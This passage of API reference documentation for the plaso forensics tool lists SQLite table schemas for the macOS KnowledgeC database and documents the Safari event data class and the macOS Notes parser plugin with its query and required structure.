FLOAT, Z_DKNOWPLAYINGMETADATAKEY__ELAPSED FLOAT, Z_DKPERIODMETADATAKEY__PERIODEND TIMESTAMP, Z_DKPERIODMETADATAKEY__PERIODSTART TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__CURRENTSUNRISE TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__CURRENTSUNSET TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__NEXTSUNRISE TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__NEXTSUNSET TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__PREVIOUSSUNRISE TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__PREVIOUSSUNSET TIMESTAMP, Z_QPMETRICSMETADATAKEY__TIMESTAMP FLOAT, Z_CDENTITYMETADATAKEY__BESTLANGUAGE VARCHAR, Z_CDENTITYMETADATAKEY__NAME VARCHAR, Z_CDPORTRAITMETADATAKEY__OSBUILD VARCHAR, Z_DKAPPINSTALLMETADATAKEY__PRIMARYCATEGORY VARCHAR, Z_DKAPPINSTALLMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ACTIVITYTYPE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDUNIQUEIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYREQUIREDSTRING VARCHAR, 
Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYUUID VARCHAR, Z_DKAPPLICATIONMETADATAKEY__BACKBOARDSTATE VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONCONTAININGBUNDLEIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONHOSTIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__LAUNCHREASON VARCHAR, Z_DKAUDIOMETADATAKEY__CHANNELS VARCHAR, Z_DKAUDIOMETADATAKEY__DATASOURCES VARCHAR, Z_DKAUDIOMETADATAKEY__IDENTIFIER VARCHAR, Z_DKAUDIOMETADATAKEY__PORTNAME VARCHAR, Z_DKAUDIOMETADATAKEY__PORTTYPE VARCHAR, Z_DKAUDIOMETADATAKEY__PREFERREDDATASOURCE VARCHAR, Z_DKAUDIOMETADATAKEY__SELECTEDDATASOURCE VARCHAR, Z_DKBATTERYSAVERMETADATAKEY__SOURCE VARCHAR, Z_DKBLUETOOTHMETADATAKEY__ADDRESS VARCHAR, Z_DKBLUETOOTHMETADATAKEY__NAME VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__FEED VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__MESSAGE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__SUBTITLE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__TITLE VARCHAR, Z_DKCALENDARMETADATAKEY__INTERACTION VARCHAR, Z_DKCALLMETADATAKEY__INTERACTION VARCHAR, Z_DKDEVICEIDMETADATAKEY__DEVICEIDENTIFIER VARCHAR, Z_DKINTENTMETADATAKEY__INTENTCLASS VARCHAR, Z_DKINTENTMETADATAKEY__INTENTVERB VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__URL VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__CITY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__COUNTRY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__DISPLAYNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__FULLYFORMATTEDADDRESS VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LOCATIONNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__POSTALCODE_V2 VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__STATEORPROVINCE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__SUBTHOROUGHFARE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__THOROUGHFARE VARCHAR, Z_DKLOCATIONMETADATAKEY__IDENTIFIER VARCHAR, Z_DKMETADATAHOMEAPPVIEW__HOMEUUID VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWINFORMATION VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWNAME VARCHAR, 
Z_DKMETADATAHOMEAPPVIEW__VIEWUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CHARACTERISTICTYPE VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICENAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICETYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETTYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__SCENENAME VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__LOCATIONDISTRIBUTION VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__MICROLOCATIONDISTRIBUTION VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ALBUM VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ARTIST VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__GENRE VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__TITLE VARCHAR, Z_DKSAFARIHISTORYMETADATAKEY__TITLE VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CLIENT VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CONTACTID VARCHAR, Z_QPMETRICSMETADATAKEY__QUERY VARCHAR, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_EXTERNALID VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTIDENTIFIERKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTLAUNCHKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONPERSISTENTPREDICATESTRINGKEY VARCHAR, ZMETADATAHASH VARCHAR UNIQUE, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDCONTENTURL VARCHAR, Z_DKAPPINSTALLMETADATAKEY__SUBCATEGORIES BLOB, Z_DKINTENTMETADATAKEY__SERIALIZEDINTERACTION BLOB, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__PHONENUMBERS BLOB, Z_QPMETRICSMETADATAKEY__CANDIDATELIST BLOB, Z_QPMETRICSMETADATAKEY__QUERYLIST BLOB )', 'Z_4EVENT': 'CREATE TABLE Z_4EVENT ( Z_4CUSTOMMETADATA INTEGER, Z_10EVENT INTEGER, PRIMARY KEY (Z_4CUSTOMMETADATA, Z_10EVENT) )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUID 
VARCHAR(255), Z_PLIST BLOB)', 'Z_MODELCACHE': 'CREATE TABLE Z_MODELCACHE (Z_CONTENT BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAME VARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)'}, {'ZADDITIONCHANGESET': 'CREATE TABLE ZADDITIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZCONTEXTUALCHANGEREGISTRATION': 'CREATE TABLE ZCONTEXTUALCHANGEREGISTRATION ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCREATIONDATE TIMESTAMP, ZIDENTIFIER VARCHAR, ZPROPERTIES BLOB )', 'ZCONTEXTUALKEYPATH': 'CREATE TABLE ZCONTEXTUALKEYPATH ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZDEVICEID INTEGER, ZISEPHEMERAL INTEGER, ZISUSERCENTRIC INTEGER, ZCREATIONDATE TIMESTAMP, ZLASTMODIFIEDDATE TIMESTAMP, ZKEY VARCHAR, ZVALUE BLOB )', 'ZCUSTOMMETADATA': 'CREATE TABLE ZCUSTOMMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZINTEGERVALUE INTEGER, ZOBJECT INTEGER, Z9_OBJECT INTEGER, ZDATEVALUE TIMESTAMP, ZDOUBLEVALUE FLOAT, ZNAME VARCHAR, ZSTRINGVALUE VARCHAR, ZVALUEHASH VARCHAR, ZBINARYVALUE BLOB )', 'ZDELETIONCHANGESET': 'CREATE TABLE ZDELETIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZHISTOGRAM': 'CREATE TABLE ZHISTOGRAM ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSTREAMTYPECODE INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCUSTOMIDENTIFIER VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZIDENTIFIER VARCHAR, ZSTREAMNAME VARCHAR )', 'ZHISTOGRAMVALUE': 'CREATE TABLE ZHISTOGRAMVALUE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZINTEGERVALUE INTEGER, 
ZHISTOGRAM INTEGER, ZCOUNT FLOAT, ZSTRINGVALUE VARCHAR )', 'ZKEYVALUE': 'CREATE TABLE ZKEYVALUE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZDOMAIN VARCHAR, ZKEY VARCHAR, ZVALUE BLOB )', 'ZOBJECT': 'CREATE TABLE ZOBJECT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUUIDHASH INTEGER, ZEVENT INTEGER, ZSOURCE INTEGER, ZCATEGORYTYPE INTEGER, ZINTEGERVALUE INTEGER, ZENDDAYOFWEEK INTEGER, ZENDSECONDOFDAY INTEGER, ZHASCUSTOMMETADATA INTEGER, ZHASSTRUCTUREDMETADATA INTEGER, ZSECONDSFROMGMT INTEGER, ZSHOULDSYNC INTEGER, ZSTARTDAYOFWEEK INTEGER, ZSTARTSECONDOFDAY INTEGER, ZVALUECLASS INTEGER, ZVALUEINTEGER INTEGER, ZVALUETYPECODE INTEGER, ZSTRUCTUREDMETADATA INTEGER, ZVALUE INTEGER, Z9_VALUE INTEGER, ZIDENTIFIERTYPE INTEGER, ZQUANTITYTYPE INTEGER, ZOBJECT INTEGER, Z9_OBJECT INTEGER, ZSUBJECT INTEGER, Z9_SUBJECT INTEGER, ZCREATIONDATE TIMESTAMP, ZLOCALCREATIONDATE TIMESTAMP, ZCONFIDENCE FLOAT, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZVALUEDOUBLE FLOAT, ZDOUBLEVALUE FLOAT, ZUUID VARCHAR, ZSTREAMNAME VARCHAR, ZVALUESTRING VARCHAR, ZSTRING VARCHAR, ZVERBPHRASE VARCHAR, ZMETADATA BLOB )', 'ZSOURCE': 'CREATE TABLE ZSOURCE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUSERID INTEGER, ZBUNDLEID VARCHAR, ZDEVICEID VARCHAR, ZGROUPID VARCHAR, ZITEMID VARCHAR, ZSOURCEID VARCHAR )', 'ZSTRUCTUREDMETADATA': 'CREATE TABLE ZSTRUCTUREDMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, Z_CDPORTRAITMETADATAKEY__ALGORITHM INTEGER, Z_CDPORTRAITMETADATAKEY__ASSETVERSION INTEGER, Z_DKAPPINSTALLMETADATAKEY__ISINSTALL INTEGER, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ISELIGIBLEFORPREDICTION INTEGER, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ISPUBLICLYINDEXABLE INTEGER, Z_DKAPPLICATIONMETADATAKEY__PROCESSIDENTIFIER INTEGER, Z_DKAUDIOMETADATAKEY__ROUTECHANGEREASON INTEGER, Z_DKBLUETOOTHMETADATAKEY__DEVICETYPE INTEGER, Z_DKBULLETINBOARDMETADATAKEY__HASDATE INTEGER, Z_DKDIGITALHEALTHMETADATAKEY__USAGETYPE INTEGER, Z_DKGLANCELAUNCHMETADATA__DEVICEIDENTIFIER 
INTEGER, Z_DKINTENTMETADATAKEY__DONATEDBYSIRI INTEGER, Z_DKINTENTMETADATAKEY__INTENTHANDLINGSTATUS INTEGER, Z_DKINTENTMETADATAKEY__INTENTTYPE INTEGER, Z_DKNOWPLAYINGMETADATAKEY__IDENTIFIER INTEGER, Z_DKNOWPLAYINGMETADATAKEY__PLAYING INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__INTERACTIONTYPE INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__SUGGESTIONTYPE INTEGER, Z_QPMETRICSMETADATAKEY__QUERYENGAGED INTEGER, Z_QPMETRICSMETADATAKEY__RESULTENGAGED INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_DATE INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_ENDDATE INTEGER, Z_CDPORTRAITMETADATAKEY__DECAYRATE FLOAT, Z_CDPORTRAITMETADATAKEY__SCORE FLOAT, Z_DKAPPLICATIONACTIVITYMETADATAKEY__EXPIRATIONDATE TIMESTAMP, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LONGITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LONGITUDE FLOAT, Z_DKNOWPLAYINGMETADATAKEY__DURATION FLOAT, Z_DKNOWPLAYINGMETADATAKEY__ELAPSED FLOAT, Z_DKPERIODMETADATAKEY__PERIODEND TIMESTAMP, Z_DKPERIODMETADATAKEY__PERIODSTART TIMESTAMP, Z_QPMETRICSMETADATAKEY__TIMESTAMP FLOAT, Z_CDENTITYMETADATAKEY__BESTLANGUAGE VARCHAR, Z_CDENTITYMETADATAKEY__NAME VARCHAR, Z_CDPORTRAITMETADATAKEY__OSBUILD VARCHAR, Z_DKAPPINSTALLMETADATAKEY__PRIMARYCATEGORY VARCHAR, Z_DKAPPINSTALLMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ACTIVITYTYPE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__CONTENTDESCRIPTION VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDUNIQUEIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__SUGGESTEDINVOCATIONPHRASE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYREQUIREDSTRING VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYUUID VARCHAR, Z_DKAPPLICATIONMETADATAKEY__BACKBOARDSTATE VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONCONTAININGBUNDLEIDENTIFIER VARCHAR, 
Z_DKAPPLICATIONMETADATAKEY__EXTENSIONHOSTIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__LAUNCHREASON VARCHAR, Z_DKAUDIOMETADATAKEY__CHANNELS VARCHAR, Z_DKAUDIOMETADATAKEY__DATASOURCES VARCHAR, Z_DKAUDIOMETADATAKEY__IDENTIFIER VARCHAR, Z_DKAUDIOMETADATAKEY__PORTNAME VARCHAR, Z_DKAUDIOMETADATAKEY__PORTTYPE VARCHAR, Z_DKAUDIOMETADATAKEY__PREFERREDDATASOURCE VARCHAR, Z_DKAUDIOMETADATAKEY__SELECTEDDATASOURCE VARCHAR, Z_DKBATTERYSAVERMETADATAKEY__SOURCE VARCHAR, Z_DKBLUETOOTHMETADATAKEY__ADDRESS VARCHAR, Z_DKBLUETOOTHMETADATAKEY__NAME VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__FEED VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__MESSAGE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__SUBTITLE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__TITLE VARCHAR, Z_DKCALENDARMETADATAKEY__INTERACTION VARCHAR, Z_DKCALLMETADATAKEY__INTERACTION VARCHAR, Z_DKDEVICEIDMETADATAKEY__DEVICEIDENTIFIER VARCHAR, Z_DKDIGITALHEALTHMETADATAKEY__WEBDOMAIN VARCHAR, Z_DKINTENTMETADATAKEY__INTENTCLASS VARCHAR, Z_DKINTENTMETADATAKEY__INTENTVERB VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__URL VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__CITY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__COUNTRY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__DISPLAYNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__FULLYFORMATTEDADDRESS VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LOCATIONNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__POSTALCODE_V2 VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__STATEORPROVINCE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__SUBTHOROUGHFARE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__THOROUGHFARE VARCHAR, Z_DKLOCATIONMETADATAKEY__IDENTIFIER VARCHAR, Z_DKMETADATAHOMEAPPVIEW__HOMEUUID VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWINFORMATION VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWNAME VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYUUID 
VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CHARACTERISTICTYPE VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICENAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICETYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETTYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__SCENENAME VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__LOCATIONDISTRIBUTION VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__MICROLOCATIONDISTRIBUTION VARCHAR, Z_DKNOTIFICATIONUSAGEMETADATAKEY__BUNDLEID VARCHAR, Z_DKNOTIFICATIONUSAGEMETADATAKEY__IDENTIFIER VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ALBUM VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ARTIST VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__GENRE VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__TITLE VARCHAR, Z_DKRELEVANTSHORTCUTMETADATAKEY__KEYIMAGEPROXYIDENTIFIER VARCHAR, Z_DKSAFARIHISTORYMETADATAKEY__TITLE VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CLIENT VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CONTACTID VARCHAR, Z_DKTOMBSTONEMETADATAKEY__EVENTSOURCEDEVICEID VARCHAR, Z_DKTOMBSTONEMETADATAKEY__EVENTSTREAMNAME VARCHAR, Z_QPMETRICSMETADATAKEY__QUERY VARCHAR, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_EXTERNALID VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTIDENTIFIERKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTLAUNCHKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONPERSISTENTPREDICATESTRINGKEY VARCHAR, ZMETADATAHASH VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDCONTENTURL VARCHAR, Z_DKDIGITALHEALTHMETADATAKEY__WEBPAGEURL VARCHAR, Z_DKAPPINSTALLMETADATAKEY__SUBCATEGORIES BLOB, Z_DKINTENTMETADATAKEY__SERIALIZEDINTERACTION BLOB, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__PHONENUMBERS BLOB, Z_DKRELEVANTSHORTCUTMETADATAKEY__SERIALIZEDRELEVANTSHORTCUT BLOB, Z_QPMETRICSMETADATAKEY__CANDIDATELIST BLOB, 
Z_QPMETRICSMETADATAKEY__QUERYLIST BLOB )', 'ZSYNCPEER': 'CREATE TABLE ZSYNCPEER ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCLOUDID VARCHAR, ZDEVICEID VARCHAR, ZRAPPORTID VARCHAR, ZUUID BLOB )', 'Z_4EVENT': 'CREATE TABLE Z_4EVENT ( Z_4CUSTOMMETADATA INTEGER, Z_11EVENT INTEGER, PRIMARY KEY (Z_4CUSTOMMETADATA, Z_11EVENT) )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUID VARCHAR(255), Z_PLIST BLOB)', 'Z_MODELCACHE': 'CREATE TABLE Z_MODELCACHE (Z_CONTENT BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAME VARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)'}]

class plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCSafariEventData
Bases: plaso.containers.events.EventData

MacOS Duet / KnowledgeC database event data for Safari.

    • bundle_identifier (str) – bundle identifier of the application.
    • duration (int) – duration of the activity.
    • title (str) – title of the webpage visited.
    • url (str) – URL visited.

    DATA_TYPE = 'mac:knowledgec:safari'

plaso.parsers.sqlite_plugins.mac_notes module

SQLite parser plugin for MacOS Notes database files.

class plaso.parsers.sqlite_plugins.mac_notes.MacNotesEventData
Bases: plaso.containers.events.EventData

Mac Notes event data.

    • text (str) – note text.
    • title (str) – note title.

    DATA_TYPE = 'mac:notes:note'

class plaso.parsers.sqlite_plugins.mac_notes.MacNotesPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS notes database files.

The MacOS Notes database file is typically stored in: test_data/NotesV7.storedata

    DATA_FORMAT = 'MacOS Notes SQLite database (NotesV7.storedata) file'

    NAME = 'mac_notes'

    ParseZHTMLSTRINGRow(parser_mediator, query, row, **unused_kwargs)
        Parses a row from the database.

        Parameters


            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (str) – query that created the row.
            • row (sqlite3.Row) – row resulting from query.

    QUERIES = [('SELECT ZNOTEBODY.ZHTMLSTRING AS zhtmlstring, ZNOTE.ZDATECREATED AS timestamp, ZNOTE.ZDATEEDITED AS last_modified_time, ZNOTE.ZTITLE as title FROM ZNOTEBODY, ZNOTE WHERE ZNOTEBODY.Z_PK = ZNOTE.Z_PK', 'ParseZHTMLSTRINGRow')]

    REQUIRED_STRUCTURE = {'ZNOTE': frozenset({'ZDATECREATED', 'ZDATEEDITED', 'ZTITLE'}), 'ZNOTEBODY': frozenset({'ZHTMLSTRING'})}

    SCHEMAS = [{'ZACCOUNT': 'CREATE TABLE ZACCOUNT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER,Z_OPT INTEGER, ZALLOWINSECUREAUTHENTICATION INTEGER,ZDIDCHOOSETOMIGRATE INTEGER, ZENABLED INTEGER, ZROOTFOLDERINTEGER, Z6_ROOTFOLDER INTEGER, ZTRASHFOLDER INTEGER,ZGMAILCAPABILITIESSUPPORT INTEGER, ZPORT INTEGER,ZSECURITYLAYERTYPE INTEGER, ZMIGRATIONOFFERED INTEGER,ZACCOUNTDESCRIPTION VARCHAR, ZEMAILADDRESS VARCHAR, ZFULLNAMEVARCHAR, ZPARENTACACCOUNTIDENTIFIER VARCHAR, ZUSERNAME VARCHAR,ZFOLDERHIERARCHYSYNCSTATE VARCHAR, ZAUTHENTICATION VARCHAR,ZHOSTNAME VARCHAR, ZSERVERPATHPREFIX VARCHAR, ZEXTERNALURL BLOB,ZINTERNALURL BLOB, ZLASTUSEDAUTODISCOVERURL BLOB,ZTLSCERTIFICATE BLOB )', 'ZATTACHMENT': 'CREATE TABLE ZATTACHMENT ( Z_PK INTEGER PRIMARY KEY, Z_ENTINTEGER, Z_OPT INTEGER, ZNOTE INTEGER, Z10_NOTE INTEGER,ZCONTENTID VARCHAR, ZFILEURL BLOB )', 'ZFOLDER': 'CREATE TABLE ZFOLDER ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER,Z_OPT INTEGER, ZACCOUNT INTEGER, Z1_ACCOUNT INTEGER, ZPARENTINTEGER, Z6_PARENT INTEGER, ZISDISTINGUISHED INTEGER,ZALLEGEDHIGHESTMODIFICATIONSEQUENCE INTEGER,ZCOMPUTEDHIGHESTMODIFICATIONSEQUENCE INTEGER, ZUIDNEXT INTEGER,ZUIDVALIDITY INTEGER, ZTRASHACCOUNT INTEGER, Z1_TRASHACCOUNTINTEGER, ZNAME VARCHAR, ZCHANGEKEY VARCHAR, ZFOLDERID VARCHAR,ZSYNCSTATE VARCHAR, ZSERVERNAME VARCHAR )', 'ZNOTE': 'CREATE TABLE ZNOTE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER,Z_OPT INTEGER, ZBODY INTEGER, ZFOLDER INTEGER, Z6_FOLDERINTEGER, ZMIMEDATASIZE INTEGER, ZDATECREATED TIMESTAMP,ZDATEEDITED TIMESTAMP, ZREMOTEID VARCHAR, ZTITLE VARCHAR,ZCHANGEKEY VARCHAR, ZUNIVERSALLYUNIQUEID BLOB )', 'ZNOTEBODY': 'CREATE TABLE ZNOTEBODY ( Z_PK INTEGER PRIMARY KEY, Z_ENTINTEGER, Z_OPT INTEGER, ZNOTE INTEGER, Z10_NOTE INTEGER,ZHTMLSTRING VARCHAR )', 'ZOFFLINEACTION': 'CREATE TABLE ZOFFLINEACTION ( Z_PK INTEGER PRIMARY KEY, Z_ENTINTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZACCOUNTINTEGER, Z1_ACCOUNT INTEGER, ZFOLDER INTEGER, Z6_FOLDER INTEGER,ZPARENT INTEGER, Z6_PARENT INTEGER, ZORIGINALPARENT INTEGER,Z6_ORIGINALPARENT INTEGER, ZFOLDER1 INTEGER, Z6_FOLDER1 INTEGER,ZNOTE INTEGER, Z10_NOTE INTEGER, ZORIGINALFOLDER INTEGER,Z6_ORIGINALFOLDER INTEGER )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUIDVARCHAR(255), Z_PLIST BLOB)', 'Z_MODELCACHE': 'CREATE TABLE Z_MODELCACHE (Z_CONTENT BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAMEVARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)'}]
